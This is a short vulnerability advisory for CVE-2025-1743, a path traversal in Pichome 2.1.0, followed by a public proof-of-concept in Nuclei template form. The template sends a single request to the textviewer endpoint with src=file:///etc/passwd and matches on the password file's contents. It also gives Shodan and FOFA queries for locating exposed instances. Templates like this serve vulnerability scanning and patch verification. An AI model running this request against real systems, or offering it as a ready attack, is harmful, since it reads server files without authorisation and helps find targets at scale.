A vulnerability, which was classified as critical, was found in zyx0814 Pichome 2.1.0. This affects an unknown part of the file /index.php?mod=textviewer. The manipulation of the argument src leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PoC代码[已公开]
id: CVE-2025-1743
info:
name: Pichome 2.1.0 - Arbitrary File Read
author: 3th1c_yuk1
severity: high
description: |
A vulnerability, which was classified as critical, was found in zyx0814 Pichome 2.1.0. This affects an unknown part of the file /index.php?mod=textviewer. The manipulation of the argument src leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
reference:
- https://github.com/sheratan4/cve/issues/4
- https://nvd.nist.gov/vuln/detail/CVE-2025-1743
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-22
cve-id: CVE-2025-1743
epss-score: 0.06501
epss-percentile: 0.90741
cpe: cpe:2.3:a:zyx0814:pichome:2.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: title:"PicHome"
fofa-query: title="PicHome"
vendor: zyx0814
product: Pichome
tags: cve,cve2025,lfi,pichome,zyx0814
http:
- method: GET
path:
- '{{BaseURL}}/index.php?mod=textviewer&src=file:///etc/passwd'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- ".scrollbar__wrap"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402200916b432e4fa36a5385a2fa784cecef26aa7fb52536faaf8d86a76bfb8cacde602207ad8915085ba6d980c93ea6fd582be8d4fb8c9ccdb9931fc82fa082831892fb3:922c64590222798bb761d5b6d8e72950